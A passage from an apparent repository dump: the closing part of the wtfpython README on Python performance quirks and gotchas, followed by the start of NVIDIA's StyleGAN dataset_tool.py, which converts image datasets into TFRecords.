``` **Output:** ```py # Executed in ipython shell using %timeit for better readability of results. # You can also use the timeit module in normal python shell/scriptm=, example usage below # timeit.timeit('add_string_with_plus(10000)', number=1000, globals=globals()) >>> NUM_ITERS = 1000 >>> %timeit -n1000 add_string_with_plus(NUM_ITERS) 124 µs ± 4.73 µs per loop (mean ± std. dev. of 7 runs, 100 loops each) >>> %timeit -n1000 add_bytes_with_plus(NUM_ITERS) 211 µs ± 10.5 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_string_with_format(NUM_ITERS) 61 µs ± 2.18 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_string_with_join(NUM_ITERS) 117 µs ± 3.21 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> l = ["xyz"]*NUM_ITERS >>> %timeit -n1000 convert_list_to_string(l, NUM_ITERS) 10.1 µs ± 1.06 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) ``` Let's increase the number of iterations by a factor of 10. ```py >>> NUM_ITERS = 10000 >>> %timeit -n1000 add_string_with_plus(NUM_ITERS) # Linear increase in execution time 1.26 ms ± 76.8 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_bytes_with_plus(NUM_ITERS) # Quadratic increase 6.82 ms ± 134 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_string_with_format(NUM_ITERS) # Linear increase 645 µs ± 24.5 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_string_with_join(NUM_ITERS) # Linear increase 1.17 ms ± 7.25 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> l = ["xyz"]*NUM_ITERS >>> %timeit -n1000 convert_list_to_string(l, NUM_ITERS) # Linear increase 86.3 µs ± 2 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) ``` #### 💡 Explanation - You can read more about [timeit](https://docs.python.org/3/library/timeit.html) or [%timeit](https://ipython.org/ipython-doc/dev/interactive/magics.html#magic-timeit) on these links. They are used to measure the execution time of code pieces. - Don't use `+` for generating long strings — In Python, `str` is immutable, so the left and right strings have to be copied into the new string for every pair of concatenations. If you concatenate four strings of length 10, you'll be copying (10+10) + ((10+10)+10) + (((10+10)+10)+10) = 90 characters instead of just 40 characters. Things get quadratically worse as the number and size of the string increases (justified with the execution times of `add_bytes_with_plus` function) - Therefore, it's advised to use `.format.` or `%` syntax (however, they are slightly slower than `+` for very short strings). - Or better, if already you've contents available in the form of an iterable object, then use `''.join(iterable_object)` which is much faster. - Unlike `add_bytes_with_plus` because of the `+=` optimizations discussed in the previous example, `add_string_with_plus` didn't show a quadratic increase in execution time. Had the statement been `s = s + "x" + "y" + "z"` instead of `s += "xyz"`, the increase would have been quadratic. ```py def add_string_with_plus(iters): s = "" for i in range(iters): s = s + "x" + "y" + "z" assert len(s) == 3*iters >>> %timeit -n100 add_string_with_plus(1000) 388 µs ± 22.4 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n100 add_string_with_plus(10000) # Quadratic increase in execution time 9 ms ± 298 µs per loop (mean ± std. dev. of 7 runs, 100 loops each) ``` - So many ways to format and create a giant string are somewhat in contrast to the [Zen of Python](https://www.python.org/dev/peps/pep-0020/), according to which, > There should be one-- and preferably only one --obvious way to do it. --- ### ▶ Slowing down `dict` lookups * <!-- Example ID: c9c26ce6-df0c-47f7-af0b-966b9386d4c3 ---> ```py some_dict = {str(i): 1 for i in range(1_000_000)} another_dict = {str(i): 1 for i in range(1_000_000)} ``` **Output:** ```py >>> %timeit some_dict['5'] 28.6 ns ± 0.115 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each) >>> some_dict[1] = 1 >>> %timeit some_dict['5'] 37.2 ns ± 0.265 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each) >>> %timeit another_dict['5'] 28.5 ns ± 0.142 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each) >>> another_dict[1] # Trying to access a key that doesn't exist Traceback (most recent call last): File "<stdin>", line 1, in <module> KeyError: 1 >>> %timeit another_dict['5'] 38.5 ns ± 0.0913 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each) ``` Why are same lookups becoming slower? #### 💡 Explanation: + CPython has a generic dictionary lookup function that handles all types of keys (`str`, `int`, any object ...), and a specialized one for the common case of dictionaries composed of `str`-only keys. + The specialized function (named `lookdict_unicode` in CPython's [source](https://github.com/python/cpython/blob/522691c46e2ae51faaad5bbbce7d959dd61770df/Objects/dictobject.c#L841)) knows all existing keys (including the looked-up key) are strings, and uses the faster & simpler string comparison to compare keys, instead of calling the `__eq__` method. + The first time a `dict` instance is accessed with a non-`str` key, it's modified so future lookups use the generic function. + This process is not reversible for the particular `dict` instance, and the key doesn't even have to exist in the dictionary. That's why attempting a failed lookup has the same effect. ### ▶ Bloating instance `dict`s * <!-- Example ID: fe706ab4-1615-c0ba-a078-76c98cbe3f48 ---> ```py import sys class SomeClass: def __init__(self): self.some_attr1 = 1 self.some_attr2 = 2 self.some_attr3 = 3 self.some_attr4 = 4 def dict_size(o): return sys.getsizeof(o.__dict__) ``` **Output:** (Python 3.8, other Python 3 versions may vary a little) ```py >>> o1 = SomeClass() >>> o2 = SomeClass() >>> dict_size(o1) 104 >>> dict_size(o2) 104 >>> del o1.some_attr1 >>> o3 = SomeClass() >>> dict_size(o3) 232 >>> dict_size(o1) 232 ``` Let's try again... In a new interpreter: ```py >>> o1 = SomeClass() >>> o2 = SomeClass() >>> dict_size(o1) 104 # as expected >>> o1.some_attr5 = 5 >>> o1.some_attr6 = 6 >>> dict_size(o1) 360 >>> dict_size(o2) 272 >>> o3 = SomeClass() >>> dict_size(o3) 232 ``` What makes those dictionaries become bloated? And why are newly created objects bloated as well? #### 💡 Explanation: + CPython is able to reuse the same "keys" object in multiple dictionaries. This was added in [PEP 412](https://www.python.org/dev/peps/pep-0412/) with the motivation to reduce memory usage, specifically in dictionaries of instances - where keys (instance attributes) tend to be common to all instances. + This optimization is entirely seamless for instance dictionaries, but it is disabled if certain assumptions are broken. + Key-sharing dictionaries do not support deletion; if an instance attribute is deleted, the dictionary is "unshared", and key-sharing is disabled for all future instances of the same class. + Additionally, if the dictionary keys have been resized (because new keys are inserted), they are kept shared *only* if they are used by a exactly single dictionary (this allows adding many attributes in the `__init__` of the very first created instance, without causing an "unshare"). If multiple instances exist when a resize happens, key-sharing is disabled for all future instances of the same class: CPython can't tell if your instances are using the same set of attributes anymore, and decides to bail out on attempting to share their keys. + A small tip, if you aim to lower your program's memory footprint: don't delete instance attributes, and make sure to initialize all attributes in your `__init__`! ### ▶ Minor Ones * <!-- Example ID: f885cb82-f1e4-4daa-9ff3-972b14cb1324 ---> * `join()` is a string operation instead of list operation. (sort of counter-intuitive at first usage) **💡 Explanation:** If `join()` is a method on a string, then it can operate on any iterable (list, tuple, iterators). If it were a method on a list, it'd have to be implemented separately by every type. Also, it doesn't make much sense to put a string-specific method on a generic `list` object API. * Few weird looking but semantically correct statements: + `[] = ()` is a semantically correct statement (unpacking an empty `tuple` into an empty `list`) + `'a'[0][0][0][0][0]` is also semantically correct, because Python doesn't have a character data type like other languages branched from C. So selecting a single character from a string returns a single-character string. + `3 --0-- 5 == 8` and `--5 == 5` are both semantically correct statements and evaluate to `True`. * Given that `a` is a number, `++a` and `--a` are both valid Python statements but don't behave the same way as compared with similar statements in languages like C, C++, or Java. ```py >>> a = 5 >>> a 5 >>> ++a 5 >>> --a 5 ``` **💡 Explanation:** + There is no `++` operator in Python grammar. It is actually two `+` operators. + `++a` parses as `+(+a)` which translates to `a`. Similarly, the output of the statement `--a` can be justified. + This StackOverflow [thread](https://stackoverflow.com/questions/3654830/why-are-there-no-and-operators-in-python) discusses the rationale behind the absence of increment and decrement operators in Python. * You must be aware of the Walrus operator in Python. But have you ever heard about *the space-invader operator*? ```py >>> a = 42 >>> a -=- 1 >>> a 43 ``` It is used as an alternative incrementation operator, together with another one ```py >>> a +=+ 1 >>> a >>> 44 ``` **💡 Explanation:** This prank comes from [Raymond Hettinger's tweet](https://twitter.com/raymondh/status/1131103570856632321?lang=en). The space invader operator is actually just a malformatted `a -= (-1)`. Which is equivalent to `a = a - (- 1)`. Similar for the `a += (+ 1)` case. * Python has an undocumented [converse implication](https://en.wikipedia.org/wiki/Converse_implication) operator. ```py >>> False ** False == True True >>> False ** True == False True >>> True ** False == True True >>> True ** True == True True ``` **💡 Explanation:** If you replace `False` and `True` by 0 and 1 and do the maths, the truth table is equivalent to a converse implication operator. ([Source](https://github.com/cosmologicon/pywat/blob/master/explanation.md#the-undocumented-converse-implication-operator)) * Since we are talking operators, there's also `@` operator for matrix multiplication (don't worry, this time it's for real). ```py >>> import numpy as np >>> np.array([2, 2, 2]) @ np.array([7, 8, 8]) 46 ``` **💡 Explanation:** The `@` operator was added in Python 3.5 keeping the scientific community in mind. Any object can overload `__matmul__` magic method to define behavior for this operator. * From Python 3.8 onwards you can use a typical f-string syntax like `f'{some_var=}` for quick debugging. Example, ```py >>> some_string = "wtfpython" >>> f'{some_string=}' "some_string='wtfpython'" ``` * Python uses 2 bytes for local variable storage in functions. In theory, this means that only 65536 variables can be defined in a function. However, python has a handy solution built in that can be used to store more than 2^16 variable names. The following code demonstrates what happens in the stack when more than 65536 local variables are defined (Warning: This code prints around 2^18 lines of text, so be prepared!): ```py import dis exec(""" def f(): """ + """ """.join(["X" + str(x) + "=" + str(x) for x in range(65539)])) f() print(dis.dis(f)) ``` * Multiple Python threads won't run your *Python code* concurrently (yes, you heard it right!). It may seem intuitive to spawn several threads and let them execute your Python code concurrently, but, because of the [Global Interpreter Lock](https://wiki.python.org/moin/GlobalInterpreterLock) in Python, all you're doing is making your threads execute on the same core turn by turn. Python threads are good for IO-bound tasks, but to achieve actual parallelization in Python for CPU-bound tasks, you might want to use the Python [multiprocessing](https://docs.python.org/3/library/multiprocessing.html) module. * Sometimes, the `print` method might not print values immediately. For example, ```py # File some_file.py import time print("wtfpython", end="_") time.sleep(3) ``` This will print the `wtfpython` after 3 seconds due to the `end` argument because the output buffer is flushed either after encountering `\n` or when the program finishes execution. We can force the buffer to flush by passing `flush=True` argument. * List slicing with out of the bounds indices throws no errors ```py >>> some_list = [1, 2, 3, 4, 5] >>> some_list[111:] [] ``` * Slicing an iterable not always creates a new object. For example, ```py >>> some_str = "wtfpython" >>> some_list = ['w', 't', 'f', 'p', 'y', 't', 'h', 'o', 'n'] >>> some_list is some_list[:] # False expected because a new object is created. False >>> some_str is some_str[:] # True because strings are immutable, so making a new object is of not much use. True ``` * `int('١٢٣٤٥٦٧٨٩')` returns `123456789` in Python 3. In Python, Decimal characters include digit characters, and all characters that can be used to form decimal-radix numbers, e.g. U+0660, ARABIC-INDIC DIGIT ZERO. Here's an [interesting story](https://chris.improbable.org/2014/8/25/adventures-in-unicode-digits/) related to this behavior of Python. * You can separate numeric literals with underscores (for better readability) from Python 3 onwards. ```py >>> six_million = 6_000_000 >>> six_million 6000000 >>> hex_address = 0xF00D_CAFE >>> hex_address 4027435774 ``` * `'abc'.count('') == 4`. Here's an approximate implementation of `count` method, which would make the things more clear ```py def count(s, sub): result = 0 for i in range(len(s) + 1 - len(sub)): result += (s[i:i + len(sub)] == sub) return result ``` The behavior is due to the matching of empty substring(`''`) with slices of length 0 in the original string. --- --- # Contributing A few ways in which you can contribute to wtfpython, - Suggesting new examples - Helping with translation (See [issues labeled translation](https://github.com/satwikkansal/wtfpython/issues?q=is%3Aissue+is%3Aopen+label%3Atranslation)) - Minor corrections like pointing out outdated snippets, typos, formatting errors, etc. - Identifying gaps (things like inadequate explanation, redundant examples, etc.) - Any creative suggestions to make this project more fun and useful Please see [CONTRIBUTING.md](/CONTRIBUTING.md) for more details. Feel free to create a new [issue](https://github.com/satwikkansal/wtfpython/issues/new) to discuss things. PS: Please don't reach out with backlinking requests, no links will be added unless they're highly relevant to the project. # Acknowledgements The idea and design for this collection were initially inspired by Denys Dovhan's awesome project [wtfjs](https://github.com/denysdovhan/wtfjs). The overwhelming support by Pythonistas gave it the shape it is in right now. #### Some nice Links! * https://www.youtube.com/watch?v=sH4XF6pKKmk * https://www.reddit.com/r/Python/comments/3cu6ej/what_are_some_wtf_things_about_python * https://sopython.com/wiki/Common_Gotchas_In_Python * https://stackoverflow.com/questions/530530/python-2-x-gotchas-and-landmines * https://stackoverflow.com/questions/1011431/common-pitfalls-in-python * https://www.python.org/doc/humor/ * https://github.com/cosmologicon/pywat#the-undocumented-converse-implication-operator * https://github.com/wemake-services/wemake-python-styleguide/search?q=wtfpython&type=Issues * WFTPython discussion threads on [Hacker News](https://news.ycombinator.com/item?id=21862073) and [Reddit](https://www.reddit.com/r/programming/comments/edsh3q/what_the_fck_python_30_exploring_and/). # 🎓 License [![WTFPL 2.0][license-image]][license-url] &copy; [Satwik Kansal](https://satwikkansal.xyz) [license-url]: http://www.wtfpl.net [license-image]: https://img.shields.io/badge/License-WTFPL%202.0-lightgrey.svg?style=flat-square ## Surprise your friends as well! If you like wtfpython, you can use these quick links to share it with your friends, [Twitter](https://twitter.com/intent/tweet?url=https://github.com/satwikkansal/wtfpython&text=If%20you%20really%20think%20you%20know%20Python,%20think%20once%20more!%20Check%20out%20wtfpython&hashtags=python,wtfpython) | [Linkedin](https://www.linkedin.com/shareArticle?url=https://github.com/satwikkansal&title=What%20the%20f*ck%20Python!&summary=If%20you%20really%20thing%20you%20know%20Python,%20think%20once%20more!) | [Facebook](https://www.facebook.com/dialog/share?app_id=536779657179021&display=page&href=https%3A%2F%2Fgithub.com%2Fsatwikkansal%2Fwtfpython&quote=If%20you%20really%20think%20you%20know%20Python%2C%20think%20once%20more!) ## Need a pdf version? I've received a few requests for the pdf (and epub) version of wtfpython. You can add your details [here](https://form.jotform.com/221593245656057) to get them as soon as they are finished. **That's all folks!** For upcoming content like this, you can add your email [here](https://form.jotform.com/221593598380062).
stylegan
1e0d5c781384ef12b50ef20a62fee5d78b38e88f
File: dataset_tool.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Tool for creating multi-resolution TFRecords datasets for StyleGAN and ProGAN.""" # pylint: disable=too-many-lines import os import sys import glob import argparse import threading import six.moves.queue as Queue # pylint: disable=import-error import traceback import numpy as np import tensorflow as tf import PIL.Image import dnnlib.tflib as tflib from training import dataset #---------------------------------------------------------------------------- def error(msg): print('Error: ' + msg) exit(1) #---------------------------------------------------------------------------- class TFRecordExporter: def __init__(self, tfrecord_dir, expected_images, print_progress=True, progress_interval=10): self.tfrecord_dir = tfrecord_dir self.tfr_prefix = os.path.join(self.tfrecord_dir, os.path.basename(self.tfrecord_dir)) self.expected_images = expected_images self.cur_images = 0 self.shape = None self.resolution_log2 = None self.tfr_writers = [] self.print_progress = print_progress self.progress_interval = progress_interval if self.print_progress: print('Creating dataset "%s"' % tfrecord_dir) if not os.path.isdir(self.tfrecord_dir): os.makedirs(self.tfrecord_dir) assert os.path.isdir(self.tfrecord_dir) def close(self): if self.print_progress: print('%-40s\r' % 'Flushing data...', end='', flush=True) for tfr_writer in self.tfr_writers: tfr_writer.close() self.tfr_writers = [] if self.print_progress: print('%-40s\r' % '', end='', flush=True) print('Added %d images.' % self.cur_images) def choose_shuffled_order(self): # Note: Images and labels must be added in shuffled order. order = np.arange(self.expected_images) np.random.RandomState(123).shuffle(order) return order def add_image(self, img): if self.print_progress and self.cur_images % self.progress_interval == 0: print('%d / %d\r' % (self.cur_images, self.expected_images), end='', flush=True) if self.shape is None: self.shape = img.shape self.resolution_log2 = int(np.log2(self.shape[1])) assert self.shape[0] in [1, 3] assert self.shape[1] == self.shape[2] assert self.shape[1] == 2**self.resolution_log2 tfr_opt = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.NONE) for lod in range(self.resolution_log2 - 1): tfr_file = self.tfr_prefix + '-r%02d.tfrecords' % (self.resolution_log2 - lod) self.tfr_writers.append(tf.python_io.TFRecordWriter(tfr_file, tfr_opt)) assert img.shape == self.shape for lod, tfr_writer in enumerate(self.tfr_writers): if lod: img = img.astype(np.float32) img = (img[:, 0::2, 0::2] + img[:, 0::2, 1::2] + img[:, 1::2, 0::2] + img[:, 1::2, 1::2]) * 0.25 quant = np.rint(img).clip(0, 255).astype(np.uint8) ex = tf.train.Example(features=tf.train.Features(feature={ 'shape': tf.train.Feature(int64_list=tf.train.Int64List(value=quant.shape)), 'data': tf.train.Feature(bytes_list=tf.train.BytesList(value=[quant.tostring()]))})) tfr_writer.write(ex.SerializeToString()) self.cur_images += 1 def add_labels(self, labels): if self.print_progress: print('%-40s\r' % 'Saving labels...', end='', flush=True) assert labels.shape[0] == self.cur_images with open(self.tfr_prefix + '-rxx.labels', 'wb') as f: np.save(f, labels.astype(np.float32)) def __enter__(self): return self def __exit__(self, *args): self.close() #---------------------------------------------------------------------------- class ExceptionInfo(object): def __init__(self): self.value = sys.exc_info()[1] self.traceback = traceback.format_exc() #---------------------------------------------------------------------------- class WorkerThread(threading.Thread): def __init__(self, task_queue): threading.Thread.__init__(self) self.task_queue = task_queue def run(self): while True: func, args, result_queue = self.task_queue.get() if func is None: break try: result = func(*args) except: result = ExceptionInfo() result_queue.put((result, args)) #---------------------------------------------------------------------------- class ThreadPool(object): def __init__(self, num_threads): assert num_threads >= 1 self.task_queue = Queue.Queue() self.result_queues = dict() self.num_threads = num_threads for _idx in range(self.num_threads): thread = WorkerThread(self.task_queue) thread.daemon = True thread.start() def add_task(self, func, args=()): assert hasattr(func, '__call__') # must be a function if func not in self.result_queues: self.result_queues[func] = Queue.Queue() self.task_queue.put((func, args, self.result_queues[func])) def get_result(self, func): # returns (result, args) result, args = self.result_queues[func].get() if isinstance(result, ExceptionInfo): print('\n\nWorker thread caught an exception:\n' + result.traceback) raise result.value return result, args def finish(self): for _idx in range(self.num_threads): self.task_queue.put((None, (), None)) def __enter__(self): # for 'with' statement return self def __exit__(self, *excinfo): self.finish() def process_items_concurrently(self, item_iterator, process_func=lambda x: x, pre_func=lambda x: x, post_func=lambda x: x, max_items_in_flight=None): if max_items_in_flight is None: max_items_in_flight = self.num_threads * 4 assert max_items_in_flight >= 1 results = [] retire_idx = [0] def task_func(prepared, _idx): return process_func(prepared) def retire_result(): processed, (_prepared, idx) = self.get_result(task_func) results[idx] = processed while retire_idx[0] < len(results) and results[retire_idx[0]] is not None: yield post_func(results[retire_idx[0]]) results[retire_idx[0]] = None retire_idx[0] += 1 for idx, item in enumerate(item_iterator): prepared = pre_func(item) results.append(None) self.add_task(func=task_func, args=(prepared, idx)) while retire_idx[0] < idx - max_items_in_flight + 2: for res in retire_result(): yield res while retire_idx[0] < len(results): for res in retire_result(): yield res #---------------------------------------------------------------------------- def display(tfrecord_dir): print('Loading dataset "%s"' % tfrecord_dir) tflib.init_tf({'gpu_options.allow_growth': True}) dset = dataset.TFRecordDataset(tfrecord_dir, max_label_size='full', repeat=False, shuffle_mb=0) tflib.init_uninitialized_vars() import cv2 # pip install opencv-python idx = 0 while True: try: images, labels = dset.get_minibatch_np(1) except tf.errors.OutOfRangeError: break if idx == 0: print('Displaying images') cv2.namedWindow('dataset_tool') print('Press SPACE or ENTER to advance, ESC to exit') print('\nidx = %-8d\nlabel = %s' % (idx, labels[0].tolist())) cv2.imshow('dataset_tool', images[0].transpose(1, 2, 0)[:, :, ::-1]) # CHW => HWC, RGB => BGR idx += 1 if cv2.waitKey() == 27: break print('\nDisplayed %d images.' % idx) #---------------------------------------------------------------------------- def extract(tfrecord_dir, output_dir): print('Loading dataset "%s"' % tfrecord_dir) tflib.init_tf({'gpu_options.allow_growth': True}) dset = dataset.TFRecordDataset(tfrecord_dir, max_label_size=0, repeat=False, shuffle_mb=0) tflib.init_uninitialized_vars() print('Extracting images to "%s"' % output_dir) if not os.path.isdir(output_dir): os.makedirs(output_dir) idx = 0 while True: if idx % 10 == 0: print('%d\r' % idx, end='', flush=True) try: images, _labels = dset.get_minibatch_np(1) except tf.errors.OutOfRangeError: break if images.shape[1] == 1: img = PIL.Image.fromarray(images[0][0], 'L') else: img = PIL.Image.fromarray(images[0].transpose(1, 2, 0), 'RGB') img.save(os.path.join(output_dir, 'img%08d.png' % idx)) idx += 1 print('Extracted %d images.' % idx) #---------------------------------------------------------------------------- def compare(tfrecord_dir_a, tfrecord_dir_b, ignore_labels): max_label_size = 0 if ignore_labels else 'full' print('Loading dataset "%s"' % tfrecord_dir_a) tflib.init_tf({'gpu_options.allow_growth': True}) dset_a = dataset.TFRecordDataset(tfrecord_dir_a, max_label_size=max_label_size, repeat=False, shuffle_mb=0) print('Loading dataset "%s"' % tfrecord_dir_b) dset_b = dataset.TFRecordDataset(tfrecord_dir_b, max_label_size=max_label_size, repeat=False, shuffle_mb=0) tflib.init_uninitialized_vars() print('Comparing datasets') idx = 0 identical_images = 0 identical_labels = 0 while True: if idx % 100 == 0: print('%d\r' % idx, end='', flush=True) try: images_a, labels_a = dset_a.get_minibatch_np(1) except tf.errors.OutOfRangeError: images_a, labels_a = None, None try: images_b, labels_b = dset_b.get_minibatch_np(1) except tf.errors.OutOfRangeError: images_b, labels_b = None, None if images_a is None or images_b is None: if images_a is not None or images_b is not None: print('Datasets contain different number of images') break if images_a.shape == images_b.shape and np.all(images_a == images_b): identical_images += 1 else: print('Image %d is different' % idx) if labels_a.shape == labels_b.shape and np.all(labels_a == labels_b): identical_labels += 1 else: print('Label %d is different' % idx) idx += 1 print('Identical images: %d / %d' % (identical_images, idx)) if not ignore_labels: print('Identical labels: %d / %d' % (identical_labels, idx)) #---------------------------------------------------------------------------- def create_mnist(tfrecord_dir, mnist_dir): print('Loading MNIST from "%s"' % mnist_dir) import gzip with gzip.open(os.path.join(mnist_dir, 'train-images-idx3-ubyte.gz'), 'rb') as file: images = np.frombuffer(file.read(), np.uint8, offset=16) with gzip.open(os.path.join(mnist_dir, 'train-labels-idx1-ubyte.gz'), 'rb') as file: labels = np.frombuffer(file.read(), np.uint8, offset=8) images = images.reshape(-1, 1, 28, 28) images = np.pad(images, [(0,0), (0,0), (2,2), (2,2)], 'constant', constant_values=0) assert images.shape == (60000, 1, 32, 32) and images.dtype == np.uint8 assert labels.shape == (60000,) and labels.dtype == np.uint8 assert np.min(images) == 0 and np.max(images) == 255 assert np.min(labels) == 0 and np.max(labels) == 9 onehot = np.zeros((labels.size, np.max(labels) + 1), dtype=np.float32) onehot[np.arange(labels.size), labels] = 1.0 with TFRecordExporter(tfrecord_dir, images.shape[0]) as tfr: order = tfr.choose_shuffled_order() for idx in range(order.size): tfr.add_image(images[order[idx]]) tfr.add_labels(onehot[order]) #---------------------------------------------------------------------------- def create_mnistrgb(tfrecord_dir, mnist_dir, num_images=1000000, random_seed=123): print('Loading MNIST from "%s"' % mnist_dir) import gzip with gzip.open(os.path.join(mnist_dir, 'train-images-idx3-ubyte.gz'), 'rb') as file: images = np.frombuffer(file.read(), np.uint8, offset=16) images = images.reshape(-1, 28, 28) images = np.pad(images, [(0,0), (2,2), (2,2)], 'constant', constant_values=0) assert images.shape == (60000, 32, 32) and images.dtype == np.uint8 assert np.min(images) == 0 and np.max(images) == 255 with TFRecordExporter(tfrecord_dir, num_images) as tfr: rnd = np.random.RandomState(random_seed) for _idx in range(num_images): tfr.add_image(images[rnd.randint(images.shape[0], size=3)]) #---------------------------------------------------------------------------- def create_cifar10(tfrecord_dir, cifar10_dir): print('Loading CIFAR-10 from "%s"' % cifar10_dir) import pickle images = [] labels = [] for batch in range(1, 6): with open(os.path.join(cifar10_dir, 'data_batch_%d' % batch), 'rb') as file: data = pickle.load(file, encoding='latin1') images.append(data['data'].reshape(-1, 3, 32, 32)) labels.append(data['labels']) images = np.concatenate(images) labels = np.concatenate(labels) assert images.shape == (50000, 3, 32, 32) and images.dtype == np.uint8 assert labels.shape == (50000,) and labels.dtype == np.int32 assert np.min(images) == 0 and np.max(images) == 255 assert np.min(labels) == 0 and np.max(labels) == 9 onehot = np.zeros((labels.size, np.max(labels) + 1), dtype=np.float32) onehot[np.arange(labels.size), labels] = 1.0 with TFRecordExporter(tfrecord_dir, images.shape[0]) as tfr: order = tfr.choose_shuffled_order() for idx in range(order.size): tfr.add_image(images[order[idx]]) tfr.add_labels(onehot[order]) #---------------------------------------------------------------------------- def create_cifar100(tfrecord_dir, cifar100_dir): print('Loading CIFAR-100 from "%s"' % cifar100_dir) import pickle with open(os.path.join(cifar100_dir, 'train'), 'rb') as file: data = pickle.load(file, encoding='latin1') images = data['data'].reshape(-1, 3, 32, 32) labels = np.array(data['fine_labels']) assert images.shape == (50000, 3, 32, 32) and images.dtype == np.uint8 assert labels.shape == (50000,) and labels.dtype == np.int32 assert np.min(images) == 0 and np.max(images) == 255 assert np.min(labels) == 0 and np.max(labels) == 99 onehot = np.zeros((labels.size, np.max(labels) + 1), dtype=np.float32) onehot[np.arange(labels.size), labels] = 1.0 with TFRecordExporter(tfrecord_dir, images.shape[0]) as tfr: order = tfr.choose_shuffled_order() for idx in range(order.size): tfr.add_image(images[order[idx]]) tfr.add_labels(onehot[order]) #---------------------------------------------------------------------------- def create_svhn(tfrecord_dir, svhn_dir): print('Loading SVHN from "%s"' % svhn_dir) import pickle images = [] labels = [] for batch in range(1, 4): with open(os.path.join(svhn_dir, 'train_%d.pkl' % batch), 'rb') as file: data = pickle.load(file, encoding='latin1') images.append(data[0]) labels.append(data[1]) images = np.concatenate(images) labels = np.concatenate(labels) assert images.shape == (73257, 3, 32, 32) and images.dtype == np.uint8 assert labels.shape == (73257,) and labels.dtype == np.uint8 assert np.min(images) == 0 and np.max(images) == 255 assert np.min(labels) == 0 and np.max(labels) == 9 onehot = np.zeros((labels.size, np.max(labels) + 1), dtype=np.float32) onehot[np.arange(labels.size), labels] = 1.0 with TFRecordExporter(tfrecord_dir, images.shape[0]) as tfr: order = tfr.choose_shuffled_order() for idx in range(order.size): tfr.add_image(images[order[idx]]) tfr.add_labels(onehot[order]) #---------------------------------------------------------------------------- def create_lsun(tfrecord_dir, lmdb_dir, resolution=256, max_images=None): print('Loading LSUN dataset from "%s"' % lmdb_dir) import lmdb # pip install lmdb # pylint: disable=import-error import cv2 # pip install opencv-python import io with lmdb.open(lmdb_dir, readonly=True).begin(write=False) as txn: total_images = txn.stat()['entries'] # pylint: disable=no-value-for-parameter if max_images is None: max_images = total_images with TFRecordExporter(tfrecord_dir, max_images) as tfr: for _idx, (_key, value) in enumerate(txn.cursor()): try: try: img = cv2.imdecode(np.fromstring(value, dtype=np.uint8), 1) if img is None: raise IOError('cv2.imdecode failed') img = img[:, :, ::-1] # BGR => RGB except IOError: img = np.asarray(PIL.Image.open(io.BytesIO(value))) crop = np.min(img.shape[:2]) img = img[(img.shape[0] - crop) // 2 : (img.shape[0] + crop) // 2, (img.shape[1] - crop) // 2 : (img.shape[1] + crop) // 2] img = PIL.Image.fromarray(img, 'RGB') img = img.resize((resolution, resolution), PIL.Image.ANTIALIAS) img = np.asarray(img) img = img.transpose([2, 0, 1]) # HWC => CHW tfr.add_image(img) except: print(sys.exc_info()[1]) if tfr.cur_images == max_images: break #---------------------------------------------------------------------------- def create_lsun_wide(tfrecord_dir, lmdb_dir, width=512, height=384, max_images=None): assert width == 2 ** int(np.round(np.log2(width))) assert height <= width print('Loading LSUN dataset from "%s"' % lmdb_dir) import lmdb # pip install lmdb # pylint: disable=import-error import cv2 # pip install opencv-python import io with lmdb.open(lmdb_dir, readonly=True).begin(write=False) as txn: total_images = txn.stat()['entries'] # pylint: disable=no-value-for-parameter if max_images is None: max_images = total_images with TFRecordExporter(tfrecord_dir, max_images, print_progress=False) as tfr: for idx, (_key, value) in enumerate(txn.cursor()): try: try: img = cv2.imdecode(np.fromstring(value, dtype=np.uint8), 1) if img is None: raise IOError('cv2.imdecode failed') img = img[:, :, ::-1] # BGR => RGB except IOError: img = np.asarray(PIL.Image.open(io.BytesIO(value))) ch = int(np.round(width * img.shape[0] / img.shape[1])) if img.shape[1] < width or ch < height: continue img = img[(img.shape[0] - ch) // 2 : (img.shape[0] + ch) // 2] img = PIL.Image.fromarray(img, 'RGB') img = img.resize((width, height), PIL.Image.ANTIALIAS) img = np.asarray(img) img = img.transpose([2, 0, 1]) # HWC => CHW canvas = np.zeros([3, width, width], dtype=np.uint8) canvas[:, (width - height) // 2 : (width + height) // 2] = img tfr.add_image(canvas) print('\r%d / %d => %d ' % (idx + 1, total_images, tfr.cur_images), end='') except: print(sys.exc_info()[1]) if tfr.cur_images == max_images: break print() #---------------------------------------------------------------------------- def create_celeba(tfrecord_dir, celeba_dir, cx=89, cy=121): print('Loading CelebA from "%s"' % celeba_dir) glob_pattern = os.path.join(celeba_dir, 'img_align_celeba_png', '*.png') image_filenames = sorted(glob.glob(glob_pattern)) expected_images = 202599 if len(image_filenames) != expected_images: error('Expected to find %d images' % expected_images) with TFRecordExporter(tfrecord_dir, len(image_filenames)) as tfr: order = tfr.choose_shuffled_order() for idx in range(order.size): img = np.asarray(PIL.Image.open(image_filenames[order[idx]])) assert img.shape == (218, 178, 3) img = img[cy - 64 : cy + 64, cx - 64 : cx + 64] img = img.transpose(2, 0, 1) # HWC => CHW tfr.add_image(img) #---------------------------------------------------------------------------- def create_from_images(tfrecord_dir, image_dir, shuffle): print('Loading images from "%s"' % image_dir) image_filenames = sorted(glob.glob(os.path.join(image_dir, '*'))) if len(image_filenames) == 0: error('No input images found') img = np.asarray(PIL.Image.open(image_filenames[0])) resolution = img.shape[0] channels = img.shape[2] if img.ndim == 3 else 1 if 